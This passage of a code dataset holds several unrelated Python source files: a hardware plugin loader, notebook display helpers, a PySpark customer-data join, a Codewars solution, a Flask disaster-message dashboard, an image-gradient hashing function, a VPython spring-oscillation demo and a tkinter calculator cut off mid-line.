print(\"Failed import in {0} skipping {1}\".format(module_name, e))\n        return []  # empty list (not None) so callers can iterate safely\n    module = sys.modules[module_name]\n    for obj_name in dir(module):\n        # Skip objects that are meant to be private.\n        if obj_name.startswith('_'):\n            continue\n        elif obj_name == module_type.__name__:\n            continue\n        itm = getattr(module, obj_name)\n        if inspect.isclass(itm) and issubclass(itm, module_type):\n            classes.append(itm)\n    return classes\n\ndef get_libs(directory, module_type):\n    classes = []\n    if directory not in sys.path:\n        sys.path.append(directory)\n\n    for fname in os.listdir(directory):\n        root, ext = os.path.splitext(fname)\n        if ext != '.py' or root == '__init__':\n            continue\n        module_name = \"%s\" % (root)\n        for iclass in _import_classes(module_name, module_type):\n            classes.append(iclass())\n    return classes\n\ntypes = get_libs('%s/hw_types' % os.path.dirname(hwbase_type.__file__), hwbase_type.HWType)\n","sub_path":"src/hw_detector/hw_types/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"360143840","text":"from IPython.core.display import display, HTML, Markdown\nfrom IPython.display import YouTubeVideo\n\ndef show_link(url, title='Authorize'):\n    display(HTML(f'Click <a href=\"{url}\">{title}</a> or open {url} in your browser'))\n\ndef video(id):\n    return YouTubeVideo(id, width=700, height=400)\n\ndef walk(item, level=0, path=[]):\n    path_str = \" > \".join(map(str, path))\n    if isinstance(item, dict):\n        print(f\"[dict {path_str}\")\n        for key, val in item.items():\n            walk(val, level+1, [*path, key])\n    elif isinstance(item, list):\n        print(f\"[list {path_str}\")\n        for i, val in enumerate(item):\n            walk(val, level+1, [*path, i])\n    else:\n        print(f'| 
{path_str}={str(item)}')\n\n\ndef print_rows(records, limit=None):\n    \"\"\"\n    print_rows([{'a':1, 'b':2}])\n    \"\"\"\n    cols = {c for record in records for c in record.keys()}\n    txt = '|'.join(cols)+'\\n'\n    txt += '|'.join(['---' for i in range(len(cols))])+'\\n'\n    for i, row in enumerate(records):\n        # escape pipes so cell text doesn't break the Markdown table\n        txt += '|'.join([str(row.get(f)).replace('|', '&#124;') for f in cols])+'\\n'\n        if limit and limit <= i:\n            break\n    display(Markdown(txt))\n\n","sub_path":"rodin_helpers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"389974528","text":"\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport pyspark.sql.functions as func\nfrom pyspark.sql import Row\nimport pandas as pd\nfrom pyspark.sql.window import Window\nfrom random import randint,seed\nfrom pyspark.sql.functions import col, expr, when, lower, collect_set,collect_list, abs\nfrom pyspark.sql.functions import concat, col, lit, regexp_replace,udf,concat_ws,rand,randn\nfrom pyspark.sql.types import DoubleType,IntegerType, ArrayType\nimport os\n\nABS_PATH=os.path.abspath(os.path.dirname(__file__))\n#from ds_filter_raw_data import DSFilterData\n\nclass DS:\n\tdef __init__(self \\\n\t\t, spark \\\n\t\t, database_name = \"34np_project_celebrus_ku\" \\\n\t\t, visitor_name = \"hd_wt_visitor\" \\\n\t\t, ewwh_ebank_agree_h_name = \"34np_gard_ewwh_ebank_agree_h\" \\\n\t\t, abt_db_p_name = \"demoss_gendab_abt_sync_abt_db_p\"\n\t\t, click_name = \"hd_wt_click\" \\\n\t\t, column_name = \"target\" \\\n\t\t, nr_rows = 20000):\n\n\t\tself.spark = spark\n\t\tself.visitor_table = spark.table(database_name + \".\" + visitor_name)\n\t\tself.ewwh_ebank_agree_h_table = spark.table(database_name + \".\" + ewwh_ebank_agree_h_name)\n\t\tself.click_table = spark.table(database_name + \".\" + click_name)\n\t\tself.abt_db_p_table = spark.table(database_name + \".\" + abt_db_p_name)\n\t\tself.n = nr_rows\n\n\t\tself.visitor_table = self.spark.table(database_name + \".\" + visitor_name)\n\t\tself.ewwh_ebank_agree_h_table = self.spark.table(database_name + \".\" + ewwh_ebank_agree_h_name)\n\t\tself.abt_db_p_table = self.spark.table(database_name + \".\" + abt_db_p_name)\n\n\tdef run(self):\n\t\traw_data_pipe = DSTest(self.spark)\n\t\traw_data_df = raw_data_pipe.run()\n\n\t\treturn raw_data_df\n\t\t#filtered_data_pipe = DSRawDataExtraction(self.spark \\\n\t\t#, raw_data_df)\n\nclass DSTest:\n\tdef __init__(self \\\n\t\t, spark_session \\\n\t\t, database_name = \"34np_project_celebrus_ku\" \\\n\t\t, visitor_name = \"hd_wt_visitor\" \\\n\t\t, ewwh_ebank_agree_h_name = \"34np_gard_ewwh_ebank_agree_h\" \\\n\t\t, abt_db_p_name = \"demoss_gendab_abt_sync_abt_db_p\"):\n\t\tself.spark = spark_session\n\t\tself.visitor_table = self.spark.table(database_name + \".\" + visitor_name)\n\t\tself.ewwh_ebank_agree_h_table = self.spark.table(database_name + \".\" + ewwh_ebank_agree_h_name)\n\t\tself.abt_db_p_table = self.spark.table(database_name + \".\" + abt_db_p_name)\n\n\tdef run(self):\n\t\tfinal_targets = self.raw_data_filtered()\n\t\treturn final_targets\n\n\tdef raw_data_filtered(self):\n\t\t\"\"\"\n\t\tJoins ewwh, abt, and visitor, while filtering out duplicates and\n\t\tsorting by date.\n\t\t\"\"\"\n\n\t\t# ewwh_ebank_agree_h_table contains [knid, ebanking-agreement, ..]\n\t\t# As there are multiple rows with identical aft_hav_ip_id(knid), choose the first.\n\t\t# NOTE: groupBy is order-preserving relative to functions (eg. 
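A self-contained demo of the recursive walk pattern above, printing the path to every leaf of a nested dict/list structure (condensed variant; the output format differs slightly from the file's):

def walk(item, path=()):
    if isinstance(item, dict):
        for key, val in item.items():
            walk(val, (*path, key))
    elif isinstance(item, list):
        for i, val in enumerate(item):
            walk(val, (*path, i))
    else:
        print(" > ".join(map(str, path)), "=", item)

walk({'a': [1, {'b': 2}], 'c': 3})
# a > 0 = 1
# a > 1 > b = 2
# c = 3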
first)\n\t\tdistinct_knid_ebank_agree = self.ewwh_ebank_agree_h_table \\\n\t\t\t.select(self.ewwh_ebank_agree_h_table.aft_hav_ip_id.substr(1, 10).alias('knid') \\\n\t\t\t\t, self.ewwh_ebank_agree_h_table.aftlnr) \\\n\t\t\t.distinct()\n\n\t\t\"\"\"\n\t\t\t.orderBy(self.ewwh_ebank_agree_h_table.aft_hav_ip_id \\\n\t\t\t\t\t, self.ewwh_ebank_agree_h_table.mtts) \\\n\t\t\t.groupBy(self.ewwh_ebank_agree_h_table.aft_hav_ip_id.substr(1, 10).alias(\"knid\")) \\\n\t\t\t.agg(func.first(self.ewwh_ebank_agree_h_table.aftlnr).alias(\"aftlnr\"))\n\t\t\"\"\"\n\t\t#print(\"dis\", distinct_knid_ebank_agree.count())\n\t\t#print(\"dis\",distinct_knid_ebank_agree.count())\n\n\t\t# self.abt_db_p_table contains [knid, age, ..]\n\t\tknid_age_unique = self.abt_db_p_table \\\n\t\t\t.groupBy(self.abt_db_p_table.knid) \\\n\t\t\t.agg(func.max(self.abt_db_p_table.customer_age).alias(\"customer_age\"))\n\t\t#print(\"knid_age_unique\", knid_age_unique.count())\n\t\t#print(\"knid_age_unique\", knid_age_unique.count())\n\n\t\t# Join the two tables. knid_agree_age = [knid, age, ebanking-agreement]\n\t\tknid_agree_age = knid_age_unique \\\n\t\t\t.join(distinct_knid_ebank_agree \\\n\t\t\t\t, distinct_knid_ebank_agree.knid == knid_age_unique.knid \\\n\t\t\t\t, \"inner\") \\\n\t\t\t.select(knid_age_unique.knid \\\n\t\t\t\t, distinct_knid_ebank_agree.aftlnr \\\n\t\t\t\t, knid_age_unique.customer_age)\n\t\t#print(\"knid agree\", knid_agree_age.count())\n\t\t#print(\"knid agree\",knid_agree_age.count())\n\n\t\t# Joined with the visitor table. \n\n\t\tfinal_targets = knid_agree_age.join(self.visitor_table \\\n\t\t\t\t\t\t\t\t\t\t\t, self.visitor_table.profileuiid == knid_agree_age.aftlnr \\\n\t\t\t\t\t\t\t\t\t\t\t, \"left_semi\")\n\t\t#print(\"final\",final_targets.count())\n\t\t#print(\"final\",final_targets.count())\n\n\t\tvisitor_table_unique_target = self.visitor_table \\\n\t\t\t.select(self.visitor_table.sessionnumber \\\n\t\t\t\t\t, func.upper(self.visitor_table.profileuiid).alias(\"profileuiid\")) \\\n\t\t\t.distinct()\n\t\t#print(\"visitor\",visitor_table_unique_target.count())\n\t\t#print(\"visitor\",visitor_table_unique_target.count())\n\n\t\tfinal_targets = visitor_table_unique_target \\\n\t\t\t.join(final_targets \\\n\t\t\t\t, visitor_table_unique_target.profileuiid == final_targets.aftlnr \\\n\t\t\t\t, 'inner')\n\t\t#print(\"final2\",final_targets.count())\n\t\t#print(\"final2\",final_targets.count())\n\n\t\tfinal_targets_corrected = final_targets \\\n\t\t\t.select(final_targets.sessionnumber \\\n\t\t\t\t\t, final_targets.profileuiid.alias(\"aftlnr\")\n\t\t\t\t\t, final_targets.knid\n\t\t\t\t\t, final_targets.customer_age.alias(\"target\"))\n\t\t#print(\"final3\",final_targets_corrected.count())\n\t\t#print(\"final3\",final_targets_corrected.count())\n\n\t\treturn final_targets_corrected\n","sub_path":"bib/data_selection/ds_test.py","file_name":"ds_test.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"471437083","text":"# https://www.codewars.com/kata/5b18e9e06aefb52e1d0001e9\ndef riders(st):\n s = 0\n count = 1\n i = 0\n while i < len(st):\n s += st[i]\n if s > 100:\n count += 1\n s = 0\n else:\n i += 1\n return count","sub_path":"The Pony Express.py","file_name":"The Pony Express.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"484197213","text":"import json\nimport plotly\nimport pandas as pd\nimport re\nfrom 
collections import Counter\n\nfrom disasterapp import app\nimport json, plotly\nfrom flask import render_template, request, jsonify\nfrom plotly.graph_objs import Bar\nfrom sklearn.externals import joblib\nfrom sqlalchemy import create_engine\n\nfrom disasterapp.tokenizer_function import tokenize_only_english\nfrom util_scripts.tokenizer_function import tokenize, Tokenizer\nfrom util_scripts import tokenizer_function\n\n\n@app.before_first_request\ndef load_model_data():\n global df\n global model\n # load data\n\n engine = create_engine('sqlite:///../data/DisasterResponse.db')\n df = pd.read_sql_table('DisasterResponse', engine)\n model = joblib.load(\"../models/classifier_me.pkl\")\n\n\n# index webpage displays cool visuals and receives user input text for model\n@app.route('/')\n@app.route('/index')\ndef index():\n # extract data needed for visuals\n # Message counts of different generes\n genre_counts = df.groupby('genre').count()['message']\n genre_names = list(genre_counts.index)\n genre_counts = genre_counts.to_list()\n\n # Message counts for different categories\n cate_counts_df = df.iloc[:, 4:].sum().sort_values(ascending=False)\n cate_counts = list(cate_counts_df)\n cate_names = list(cate_counts_df.index)\n\n # Top keywords in Social Media in percentages\n social_media_messages = ' '.join(df[df['genre'] == 'social']['message'])\n social_media_tokens = tokenize_only_english(social_media_messages)\n\n # social_media_tokens = tokenize(social_media_messages)\n social_media_wrd_counter = Counter(social_media_tokens).most_common()\n\n items, counts = zip(*social_media_wrd_counter)\n word_frequency = pd.Series(counts, index=items) / sum(counts) * 100\n social_media_wrds = word_frequency.index[:50].to_list()\n social_media_wrd_pct = word_frequency[:50].to_list()\n\n\n # direct_messages = ' '.join(df[df['genre'] == 'direct']['message'])\n #\n # direct_tokens = tokenize_only_english(direct_messages)\n # # social_media_tokens = tokenize(social_media_messages)\n # direct_wrd_counter = Counter(direct_tokens).most_common()\n #\n # items, counts = zip(*direct_wrd_counter)\n # word_frequency = pd.Series(counts, index=items) / sum(counts) * 100\n # direct_wrds = word_frequency.index[:50].to_list()\n # direct_wrd_pct = word_frequency[:50].to_list()\n\n # Top keywords in Direct in percentages\n direct_messages = ' '.join(df[df['genre'] == 'direct']['message'])\n direct_tokens = tokenize(direct_messages)\n direct_wrd_counter = Counter(direct_tokens).most_common()\n direct_wrd_cnt = [i[1] for i in direct_wrd_counter]\n direct_wrd_pct = [i / sum(direct_wrd_cnt) * 100 for i in direct_wrd_cnt]\n direct_wrds = [i[0] for i in direct_wrd_counter]\n # create visuals\n\n graphs = [\n # Histogram of the message genere\n {\n 'data': [\n Bar(\n x=genre_names,\n y=genre_counts\n )\n ],\n\n 'layout': {\n 'title': 'Distribution of Message Genres',\n 'yaxis': {\n 'title': \"Count\"\n },\n 'xaxis': {\n 'title': \"Genre\"\n }\n }\n },\n # histogram of social media messages top 30 keywords\n {\n 'data': [\n Bar(\n x=social_media_wrds[:50],\n y=social_media_wrd_pct[:50]\n )\n ],\n\n 'layout': {\n 'title': \"Top 50 Keywords in Social Media Messages\",\n 'xaxis': {'tickangle': 60\n },\n 'yaxis': {\n 'title': \"% Total Social Media Messages\"\n }\n }\n },\n\n # histogram of direct messages top 30 keywords\n {\n 'data': [\n Bar(\n x=direct_wrds[:50],\n y=direct_wrd_pct[:50]\n )\n ],\n\n 'layout': {\n 'title': \"Top 50 Keywords in Direct Messages\",\n 'xaxis': {'tickangle': 60\n },\n 'yaxis': {\n 'title': \"% Total Direct 
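The keyword-percentage computation in index() above boils down to a Counter plus a normalized pandas Series. A tiny sketch with a stand-in token list (the real code tokenizes the message corpus first):

from collections import Counter
import pandas as pd

tokens = "help water need water food water".split()  # stand-in tokenizer output
items, counts = zip(*Counter(tokens).most_common())
pct = pd.Series(counts, index=items) / sum(counts) * 100
print(pct)  # water at 50.0, then help/need/food at ~16.7 each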
Messages\"\n }\n }\n },\n\n # histogram of messages categories distributions\n {\n 'data': [\n Bar(\n x=cate_names,\n y=cate_counts\n )\n ],\n\n 'layout': {\n 'title': \"Distribution of Message Categories\",\n 'xaxis': {'tickangle': 60\n },\n 'yaxis': {\n 'title': \"count\"\n }\n }\n },\n\n ]\n\n # encode plotly graphs in JSON\n ids = [\"graph-{}\".format(i) for i, _ in enumerate(graphs)]\n graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)\n\n # render web page with plotly graphs\n return render_template('master.html', ids=ids, graphJSON=graphJSON)\n\n\n# web page that handles user query and displays model results\n@app.route('/go')\ndef go():\n # save user input in query\n query = request.args.get('query', '')\n\n # use model to predict classification for query\n classification_labels = model.predict([query])[0]\n classification_results = dict(zip(df.columns[4:], classification_labels))\n\n # This will render the go.html Please see that file.\n return render_template(\n 'go.html',\n query=query,\n classification_result=classification_results\n )\n","sub_path":"app/disasterapp/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"604957147","text":"import numpy as np\nfrom math import atan2, floor, pi\nfrom numba import njit, prange\n\n\ndef hashkey(block, Qangle, W):\n # Calculate gradient\n gy, gx = np.gradient(block)\n return _hashkey(gx,gy,Qangle,W)\n\n@njit\ndef _hashkey(gx,gy,Qangle,W):\n # Transform 2D matrix into 1D array\n gx = gx[1:-1,1:-1].ravel()\n gy = gy[1:-1,1:-1].ravel()\n\n # SVD calculation\n G = np.vstack((gx,gy)).T\n GTWG = G.T.dot(W).dot(G)\n w, v = np.linalg.eig(GTWG)\n\n # Make sure V and D contain only real numbers\n w = np.real(w)\n v = np.real(v)\n\n # Sort w and v according to the descending order of w\n idx = w.argsort()[::-1]\n w = w[idx]\n v = v[:,idx]\n\n # Calculate theta\n theta = atan2(v[1,0], v[0,0])\n if theta < 0:\n theta = theta + pi\n\n # Calculate lamda\n lamda = w[0]\n\n # Calculate u\n sqrtlamda1 = np.sqrt(w[0])\n sqrtlamda2 = np.sqrt(w[1])\n if sqrtlamda1 + sqrtlamda2 == 0:\n u = 0\n else:\n u = (sqrtlamda1 - sqrtlamda2)/(sqrtlamda1 + sqrtlamda2)\n\n # Quantize\n angle = floor(theta/pi*Qangle)\n if lamda < 0.0001:\n strength = 0\n elif lamda > 0.001:\n strength = 2\n else:\n strength = 1\n if u < 0.25:\n coherence = 0\n elif u > 0.5:\n coherence = 2\n else:\n coherence = 1\n\n # Bound the output to the desired ranges\n if angle > Qangle-1:\n angle = Qangle-1\n elif angle < 0:\n angle = 0\n\n return angle, strength, coherence, theta, lamda, u\n","sub_path":"hashkey.py","file_name":"hashkey.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"250907978","text":"'''\r\nUse the Go Direct Motion Detector (GDX-MD) to record the oscillations of a mass\r\non a spring. Compare measured data to modeled data. 
Vpython is used to give a \r\n3D visual representation of both the measured and modeled data.\r\n\r\nThis example assumes the Go Direct Motion Sensor is connected via USB, change to Bluetooth\r\nas needed in the code below.\r\n\r\nLook closely at the Experimental Setup Variables section below to modify variables, as needed.\r\n\r\n'''\r\n\r\nimport os\r\nimport sys\r\n\r\n# This allows us to import the local gdx module that is up one directory\r\ngdx_module_path = os.path.abspath(os.path.join('.'))\r\n# If the module is not found, uncomment and try two dots. Also, uncomment the print(sys.path)\r\n#gdx_module_path = os.path.abspath(os.path.join('..'))\r\nif gdx_module_path not in sys.path:\r\n sys.path.append(gdx_module_path)\r\n\r\n# If there is an error trying to find the gdx module, uncomment this to see where\r\n# the program is looking to find the gdx folder\r\n#print(sys.path)\r\n\r\nfrom gdx import gdx \r\ngdx = gdx.gdx()\r\n\r\nfrom vpython import *\r\nimport math\r\n\r\n#Vpython Canvas\r\nscene = canvas(title='Simple Harmonic Oscillation',align = \"left\", center=vector(0,30,0))\r\nscene.caption = ' Click Record for Data Collection'\r\nscene.append_to_caption('\\n\\n', ' ')\r\nscene.width = 300\r\nscene.height = 500\r\n\r\n#Experimental Setup Variables\r\n'''An easy way to get the starting_spring_postion value is to measure the distance using the motion detector.\r\nTo do this, run the program without the mass oscillating and click the Record button to take measurements. \r\nYou want the Vpython graph to have a plot with a 0 amplitude. If it is not 0 then look at the measurements \r\nthat are printed to the terminal. Use those measurements to determine the starting_spring_position value'''\r\ntmax = 10 #duration to take measurements from the motion detector (seconds)\r\nstarting_spring_position = 35.56 #equilibrium position - distance from detector to bottom of mass when hanging without oscillating (cm)\r\nspring_equilibrium_length = 21 #length of spring with mass hanging\r\nk=6 # spring constant starting value. A Vpython slider is created to adjust this value when running the program. 
\r\n# (note theoretical T = 2 pi SQR(mass/k); I measured as about 0.8N/0.154cm = 5.1 N/m)\r\n\r\n\r\n#Variables\r\nspring_stretch_model = 0 #variable to store location of spring in the model\r\nmax_stretch = 0\r\ntime_at_max_stretch = 0\r\nindex_at_max_stretch = 0\r\nactual_list = []\r\n\r\n\r\n#Vpython Configuration:\r\nbase_actual = box(pos=vector(0,0,0), size=vector(30,2,20), color=color.yellow)\r\nrod_actual = cylinder(pos=vector(base_actual.pos.x-5,0,0), axis=vector(0,65,0), radius=1, color=color.blue)\r\ntop_support_actual = cylinder(pos=vector(rod_actual.pos.x-5,rod_actual.axis.y-5,0), axis=vector(25,0,0), radius=1, color=color.blue)\r\nspring_actual = helix(pos=vector(top_support_actual.pos), axis=vector(0,-spring_equilibrium_length,0), coils=20, radius=1)\r\nspring_actual.axis.y = -spring_equilibrium_length\r\nspring_actual.pos.x = top_support_actual.pos.x + top_support_actual.axis.x/1.25\r\nspring_actual.pos.y = top_support_actual.pos.y - top_support_actual.radius #move the spring y position to the underside of the top support\r\nmass_actual = cylinder(pos=vector(spring_actual.pos), axis =vector(0,-8,0), radius = 3, color=color.blue, opacity=1)\r\nmass_actual.pos.y = spring_actual.pos.y-spring_equilibrium_length\r\nmotiondetector = box(pos=vector(mass_actual.pos.x,4,0), size=vector(6,6,6), color=color.gray(0.5))\r\nmotiondetector_foil = cylinder(pos=vector(motiondetector.pos), axis =vector(0,3.1,0), radius = 2, color=color.white)\r\nspring_model = helix(pos=vector(top_support_actual.pos), axis=vector(0,-spring_equilibrium_length,0), coils=20, radius=1)\r\nspring_model.axis.y = -spring_equilibrium_length\r\nspring_model.pos.x = top_support_actual.pos.x + top_support_actual.axis.x/2\r\nspring_model.pos.y = top_support_actual.pos.y - top_support_actual.radius #move the spring y position to the underside of the top support\r\nmass_model = cylinder(pos=vector(spring_model.pos), axis =vector(0,-8,0), radius = 3, color=color.red, opacity=1)\r\nmass_model.pos.y = spring_model.pos.y-spring_equilibrium_length\r\nmass_model.mass = 0.1 # mass hung on the spring(kg)\r\nmass_model.p = 0 # initial momentum of mass (kg*m/s)\r\n\r\n\r\n#Vpython graph:\r\npos_graph=graph(title= \"position vs time\", xmin=0, xmax=tmax, ymin=-5, ymax=5, align='right')\r\npos_graph.width = 800\r\npos_graph.height = 500\r\nmodel_data=gcurve(color=color.red)\r\nactual_data=gcurve(color=color.blue)\r\nmodel_data.plot(0,0) \r\nactual_data.plot(0,0)\r\nmodel_data.delete()\r\nactual_data.delete()\r\n\r\n\r\nscene.autoscale = False\r\n\r\n\r\ngdx.open_usb()\r\n#gdx.open_ble()\r\n\r\ngdx.select_sensors([5]) #use the motion detector distance channel only. This is channel 5\r\n\r\n\r\n##############################\r\n# A record button is created. 
Use it to take live measurements from the Motion Detector\r\n##############################\r\ndef Record(r):\r\n\r\n    model_data.delete() #clear the graph\r\n    actual_data.delete()\r\n\r\n    global time_at_max_stretch #these variables will be used to pass the info to the Model function\r\n    global index_at_max_stretch\r\n    global actual_list\r\n    global max_stretch\r\n    global dt\r\n    \r\n    spring_stretch_actual = 0 \r\n    max_stretch = 0\r\n    i=0\r\n    t = 0.0\r\n    dt = 0.05 #note gdx.start below where it sets the sampling period to dt*1000 = 50ms (0.05 seconds)\r\n    \r\n    time_at_max_stretch = 0\r\n    index_at_max_stretch = 0\r\n    actual_list = []\r\n\r\n    #gdx.start(period=50) #start data collection\r\n    gdx.start(period = (dt*1000))\r\n    \r\n    while t < tmax + dt: #use the loop to read the data\r\n        \r\n        measurements = gdx.read() #returns a list of measurements from the sensors selected.\r\n        if measurements is None: \r\n            break \r\n        print('distance (cm) = ', measurements[0]*100)\r\n        spring_stretch_actual = measurements[0]*100 - starting_spring_position\r\n        spring_actual.axis.y = -spring_equilibrium_length + spring_stretch_actual\r\n        mass_actual.pos.y = spring_actual.pos.y-spring_equilibrium_length + spring_stretch_actual\r\n        actual_data.plot(t,spring_stretch_actual)\r\n        actual_list.append(spring_stretch_actual) #create a list of all the measurements. Store in a variable to send to the Model function\r\n        \r\n        if spring_stretch_actual>max_stretch: #Capture the biggest stretch. Store in variables to send to the Model function\r\n            max_stretch=spring_stretch_actual\r\n            time_at_max_stretch = t\r\n            index_at_max_stretch = i\r\n        \r\n        t = t + dt\r\n        i = i + 1\r\n    gdx.stop() \r\nbutton( bind=Record, text='Record', pos=scene.caption_anchor)\r\n\r\n\r\n##############################\r\n# A Model button is created. 
Use it to plot the model data and the saved measurements from Record\r\n##############################\r\ndef model(m):\r\n    global actual_list\r\n    if not actual_list: #Model needs measurements from Record first; this guard also ensures dt has been set\r\n        print('No recorded data yet - click the Record button first.')\r\n        return\r\n    print (\"len of list at beginning = \", len(actual_list))\r\n    print('\\n\\n')\r\n\r\n    actual_list_for_model = []\r\n    spring_model.pos.y = top_support_actual.pos.y - top_support_actual.radius #move the spring y position to the underside of the top support\r\n    mass_model.pos.y = spring_model.pos.y-spring_equilibrium_length\r\n    spring_model.axis.y = -spring_equilibrium_length\r\n    spring_actual.pos.y = top_support_actual.pos.y - top_support_actual.radius\r\n    mass_actual.pos.y = spring_actual.pos.y-spring_equilibrium_length\r\n    spring_actual.axis.y = -spring_equilibrium_length\r\n    model_data.delete()\r\n    actual_data.delete()\r\n    print('model actual list =', actual_list)\r\n    print('\\n\\n')\r\n    print (\"len of list = \", len(actual_list))\r\n    print('\\n\\n')\r\n    actual_list_for_model = list(actual_list)\r\n    i=0\r\n    del actual_list_for_model[0:index_at_max_stretch]\r\n    print (\"len of list after del = \", len(actual_list))\r\n    print('\\n\\n')\r\n    print (\"len of model after del = \", len(actual_list_for_model))\r\n    print('\\n\\n')\r\n\r\n    t = time_at_max_stretch\r\n    spring_stretch_model = max_stretch\r\n    print('spring stretch model =', spring_stretch_model)\r\n    print('\\n\\n')\r\n    #dt = 0.05\r\n    print('k = ', k)\r\n    print('\\n\\n')\r\n    mass_model.p = 0\r\n\r\n    while t < tmax + dt:\r\n        rate(10)\r\n        actual_data.plot(t,actual_list_for_model[i])\r\n        model_data.plot(t,spring_stretch_model)\r\n\r\n        Fe = k*(spring_stretch_model)*-1 # forces acting on the system (elastic force)\r\n        mass_model.p = mass_model.p + Fe*dt # update the momentum (semi-implicit Euler step)\r\n        spring_stretch_model = spring_stretch_model + (mass_model.p/mass_model.mass)*dt\r\n\r\n        spring_actual.axis.y = -spring_equilibrium_length + actual_list_for_model[i]\r\n        spring_model.axis.y = -spring_equilibrium_length + spring_stretch_model\r\n        mass_actual.pos.y = spring_actual.pos.y-spring_equilibrium_length + actual_list_for_model[i]\r\n        mass_model.pos.y = spring_model.pos.y-spring_equilibrium_length + spring_stretch_model \r\n        \r\n        t = t + dt\r\n        i = i + 1\r\nbutton( bind=model, text='Model', pos=scene.caption_anchor)\r\n\r\n##############################\r\n# An Exit button is created. Use it to close the USB connection\r\n##############################\r\ndef exit(e):\r\n    gdx.close()\r\nbutton( bind=exit, text='EXIT', color=color.red, pos=scene.caption_anchor)\r\nscene.append_to_caption('\\n\\n')\r\n\r\n##############################\r\n'''\r\nA slider is created. Use it to modify the spring constant. The function specified by \"bind\" is \r\ncalled when the user drags the slider. In this case, the function S is called. This function\r\nupdates the variable \"k\" with the value of the slider and updates the variable \"wt\" with new text.\r\n'''\r\n##############################\r\ndef S(s): # this is the function that is called when the slider is changed.\r\n    print(s.value)\r\n    global k #the k value is modified by the slider and used in the model function\r\n    k = s.value\r\n    wt.text = 'spring constant k = {:1.2f}'.format(s.value)\r\nsl = slider(min=0, max=10, value=k, length=200, bind=S, left=20) #when the slider is changed, the function S is called using \"bind = S\"\r\n#scene.append_to_caption('\\n\\n')\r\nscene.append_to_caption(' ')\r\n\r\nwt = wtext(text='spring constant k = {:1.2f}'.format(k))\r\nscene.append_to_caption('\\n\\n')\r\n\r\n##############################\r\n# A second slider is created. 
Use it to modify the start position (distance from top of MD to bottom of weight)\r\n##############################\r\ndef R(r): \r\n    print(r.value)\r\n    global starting_spring_position #the starting_spring_position value is modified by the slider and used in the Record function\r\n    starting_spring_position = r.value\r\n    rt.text = 'start position = {:1.2f}'.format(r.value)\r\nslsl = slider(min=30, max=40, value=starting_spring_position, length=200, bind=R, left=20)\r\nscene.append_to_caption(' ')\r\n\r\nrt = wtext(text='start position = {:1.2f}'.format(starting_spring_position))\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"python/advanced_examples/simple_harmonic_oscillator.py","file_name":"simple_harmonic_oscillator.py","file_ext":"py","file_size_in_byte":10849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"34091494","text":"#simple calculator\n#Author = kngsley okpara\n\nfrom tkinter import *\nfrom tkinter import ttk\nfrom math import *\n\n\nexpression = \" \"\n\ndef press(num):\n    global expression\n    expression = expression + str(num)\n    equation.set(expression)\ndef equalpress():\n    try:\n        global expression\n        total = str(eval(expression))\n        equation.set(total)\n        expression = \" \"\n    except:\n        equation.set(\"error\")\n        expression = \" \"\ndef clear():\n    global expression\n    expression = \" \"\n    equation.set(\" \")\n\n\n\nif __name__ == \"__main__\":\n\n    root = Tk()\n\n    root.title(\"KINGS CALC\")\n\n    frame = Frame(root)\n\n\n\n    menubar = Menu(root)\n    filemenu = Menu(menubar)\n    filemenu.add_command(label=\"Scientific\", command=lambda:press(5))\n    filemenu.add_separator()\n    filemenu.add_command(label=\"Statistics\", command=lambda:press(6))\n    filemenu.add_separator()\n    filemenu.add_command(label=\"Exit\",command=root.destroy)\n    menubar.add_cascade(label=\"File\", menu=filemenu)\n    root.config(menu=menubar)\n\n\n\n    frame.configure(background=\"light green\")\n\n    equation = StringVar()\n    \n\n    expression_field = Entry(frame, textvariable=equation, bg = \"white\", bd = 33, insertwidth = 9, width = 40,)\n    expression_field.grid(row=0, columnspan=7)\n\n    equation.set('calculate here')\n\n    \"\"\"#calculation area\n    calc_area = Entry(root)\n    calc_area.pack(side=TOP, fill=X, )\"\"\"\n\n    \n\n    #num is the short form of number, while sym is the short form of symbol\n    clear_all = Button(frame,font=('Script MT Bold',20),text='CE',width=4,height=1,command=clear, bg=\"blue\", bd=14).grid(row=0,column=1)\n    power = Button(frame,font=('Script MT Bold',20),text='X^',width=4,height=1,command=lambda:press('**'),bd=14).grid(row=0,column=5) #fixed: was command=pow(x, y), which called pow once at startup; also renamed from 'clear' to stop shadowing the clear() function\n    num7 = Button(frame,font=('Script MT Bold',20),text='7',width=4,height=2,command=lambda:press(7),bg=\"Gold\",bd=14).grid(row=1,column=1)\n    num8 = Button(frame,font=('Script MT Bold',20),text='8',width=4,height=2,command=lambda:press(8),bg=\"Gold\",bd=14).grid(row=1,column=2, sticky=W)\n    num9 = Button(frame,font=('Script MT Bold',20),text='9',width=4,height=2,command=lambda:press(9),bg=\"Gold\",bd = 14).grid(row=1,column=3)\n    num4 = Button(frame,font=('Script MT Bold',20),text='4',width=4,height=2,command=lambda:press(4),bg=\"Gold\",bd=14).grid(row=2,column=1)\n    num5 = Button(frame,font=('Script MT Bold',20),text='5',width=4,height=2,command=lambda:press(5),bg=\"Gold\",bd=14).grid(row=2,column=2)\n    num6 = Button(frame,font=('Script MT Bold',20),text='6',width=4,height=2,command=lambda:press(6),bg=\"Gold\",bd=14).grid(row=2,column=3)\n    num1 = Button(frame,font=('Script MT 
